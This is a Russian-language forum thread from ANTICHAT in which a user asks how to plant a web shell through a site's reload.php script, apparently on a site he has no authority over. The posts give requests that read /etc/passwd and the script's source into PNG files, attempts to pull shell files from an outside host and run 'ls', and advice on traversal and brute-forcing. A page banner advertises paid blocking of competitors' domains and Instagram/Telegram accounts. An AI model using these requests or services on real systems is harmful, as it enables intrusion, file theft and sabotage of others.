УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Заливка шелла через reload.php

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

24.03.2018, 09:22

Muracha

Guest

Сообщений: n/a

Провел на форуме:
54593

Репутация: 0

На сервере крутится скрипт gyazo куда при обращении в определенную папку падают скриншоты(в папку db)

http://site.ru/upload.cgi

и создается скрин с хешированным значением

http://site.ru/db/fhckddkjcdfj.png

Так же на сайте есть скрипт reload.php - Исходники мне увы неизвестны, скорее самопис.

При обращении к нему

http://site.com/reload.php?image=htt...g.png.html.ico здесь любое расширение кроме PHP)&type=jpg&title=test123(здесь может быть любое название)&state=new создается в папке db файл уже со своим названием

http://site.ru/test123.png

Проблема в том, что создается файл жестко с png но любыми внутренностями. Хоть php, хоть html - неважно. Загрузить и создать файл со свободными разрешением я не могу, хотя пытался делать такой запрос:

http://site.ru/reload.php?image=htt.../1.php.txt&type=jpg&title=test123.&state=new

Пробовал обрезать нули но выходит пустая страница.

Могу предоставить ссылку в пм по запросу, а если поможете не поленюсь и отблагодарить

24.03.2018, 14:09

Nufai

Guest

Сообщений: n/a

Провел на форуме:
15179

Репутация: 0

directory traversal пробовал? А если указать существующий файл, перепишет его, или добавит новые внутренности к существующим? И еще, параметр type что-то меняет вообще? Можно попробовать еще локальный файл включить.

https://rdot.org/forum/showthread.php?t=343 - хоть там и врятли инклуд, но может помочь(еле нашел эту ссылку)

24.03.2018, 14:21

Muracha

Guest

Сообщений: n/a

Провел на форуме:
54593

Репутация: 0

Цитата:

Сообщение от Nufai

Nufai said:
↑
directory traversal пробовал? А если указать существующий файл, перепишет его, или добавит новые внутренности к существующим? И еще, параметр
type
что-то меняет вообще? Можно попробовать еще локальный файл включить.
https://rdot.org/forum/showthread.php?t=343
- хоть там и врятли инклуд, но может помочь(еле нашел эту ссылку)

Пробовал ли я directory traversal? Да. выдает белую страницу, но ничего более. Ни загрузки файлов. ни вывод. Ничего.

Файл перезаписывает. тупо перезаписывает внутреннее содержимое, но не меняет расширение.

параметр type похоже ни на что не влияет, там хоть dLLL2123 укажи - он спокойно зальет картинку или html со стороннего ресурса и переименует в *.png

Вообще, бессмысленно все.

24.03.2018, 14:30

Nufai

Guest

Сообщений: n/a

Провел на форуме:
15179

Репутация: 0

Если не меняет расширения, то можно побрутить папку на предмет существующих файлов(другие php, .htaccess, еще что-то)

24.03.2018, 14:36

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

так ты не создавай темы, а сразу всё подробно описывай с скринами, с запросами и результатами, нахрена плодить овер много тем ?

03.04.2018, 10:28

Muracha

Guest

Сообщений: n/a

Провел на форуме:
54593

Репутация: 0

Запрос типа:

reload.php?image=/etc/passwd&type=png&title=test&state=new - создает в папке /db/ файл test.png с содержимым /etc/passwd

Если файл отсутствует, то выдает ошибку 404

То есть это локальная читалка файлов где данные записываются в png файл.

Хочу залить шелл но при запросе:

reload.php?image=http://www.shell.com/1.txt&type=png&...hell&state=new - так же создается файл в папке /db/ исключительно в png формате.

Можно ли залить шелл или выполнить удаленно команду если команды не срабатывают и выдают пустую белую страницу?

reload.php?image=http://www.shell.com/1.php&type=png&...hell&state=new

reload.php?image=http://www.shell.com/1.txt&type=png&...hell&state=new

reload.php?image=http://www.shell.com/1.txt?c=ls

03.04.2018, 16:11

dmax0fw

Guest

Сообщений: n/a

Провел на форуме:
20361

Репутация: 46

Цитата:

Сообщение от Muracha

Muracha said:
↑
Так же на сайте есть скрипт reload.php - Исходники мне увы неизвестны, скорее самопис.

Цитата:

Сообщение от Muracha

Muracha said:
↑
То есть это локальная читалка файлов где данные записываются в png файл.

попробуй исходники поискать, если найдёшь то там явно больше прояснится

вообще если параметр type не влияет на результат, то скорее всего в коде жёстко прописано расширение, но это не точно

03.04.2018, 16:18

dmax0fw

Guest

Сообщений: n/a

Провел на форуме:
20361

Репутация: 46

Цитата:

Сообщение от dmax0fw

dmax0fw said:
↑
попробуй исходники поискать, если найдёшь то там явно больше прояснится

хотя возможно и не нужно искать, попробуй по относительному пути прочитать

Код:

Code:
reload.php?image=./reload.php&type=png&title=test&state=new

03.04.2018, 16:21

Muracha

Guest

Сообщений: n/a

Провел на форуме:
54593

Репутация: 0

Цитата:

Сообщение от dmax0fw

dmax0fw said:
↑
попробуй исходники поискать, если найдёшь то там явно больше прояснится
вообще если параметр type не влияет на результат, то скорее всего в коде жёстко прописано расширение, но это не точно

Параметр type на результат не влияет, то есть можно без него:

reload.php?image=/etc/passwd&title=blalbalbabla&state=new

reload.php?image=/etc/passwd&type=php&title=blalbalba&state=new

Исходник получил. Базу сайт не использует.

.SpoilerTarget" type="button">Spoiler: code